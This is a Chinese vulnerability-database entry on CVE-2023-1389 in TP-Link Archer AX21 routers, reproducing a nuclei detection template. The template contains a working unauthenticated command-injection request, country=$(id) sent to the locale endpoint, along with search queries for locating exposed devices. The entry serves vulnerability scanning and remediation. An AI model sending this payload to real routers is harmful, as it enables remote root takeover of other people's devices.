漏洞信息
漏洞名称: TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: TP-Link Archer AX21 (AX1800)路由器存在未授权的操作系统命令注入漏洞,攻击者可以通过locale端点中的country参数执行任意命令。该漏洞允许远程攻击者以root权限执行任意命令,属于严重级别的安全威胁。
受影响产品: TP-Link Archer AX21 (AX1800)是一款家用无线路由器,广泛用于家庭和小型办公室网络环境。它提供了高速的无线网络连接和多种网络管理功能。由于其普及度高,该漏洞的影响范围较广。
漏洞解释: 此漏洞属于命令执行类型,具体为未授权的OS命令注入。漏洞的技术根源在于对locale端点中的country参数输入验证不足,导致攻击者可以注入恶意命令并在路由器上以最高权限执行。
影响分析: 该漏洞的安全风险极高,攻击者无需任何认证即可远程利用此漏洞执行任意命令,可能导致完全控制受影响的设备。攻击者可以利用此漏洞进行数据泄露、服务中断、甚至将设备纳入僵尸网络等恶意活动。由于漏洞利用简单且影响严重,建议用户立即更新到TP-Link提供的最新固件版本以修复此漏洞。
产品厂商: tp-link
产品名称: Archer AX21 (AX1800)
搜索语法: body=”tp-link”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/fb7581de9f1c4d5f453140a22a25d66884ac9f33/http%2Fcves%2F2023%2FCVE-2023-1389.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| id: CVE-2023-1389
info: name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection author: ritikchaddha severity: critical description: | TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root. remediation: | Update to the latest firmware version provided by TP-Link. reference: - https://www.tenable.com/security/research/tra-2023-11 - https://nvd.nist.gov/vuln/detail/CVE-2023-1389 - https://github.com/tenable/poc-cve-2023-1389 classification: cve-id: CVE-2023-1389 cwe-id: CWE-78 epss-score: 0.94022 epss-percentile: 0.99883 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 metadata: max-request: 1 vendor: tp-link product: archer-ax21 fofa-query: body="tp-link" shodan-query: 'title:"TP-Link Router"' verified: true tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev
http: - raw: - | POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id)
matchers-condition: and matchers: - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status status: - 200
|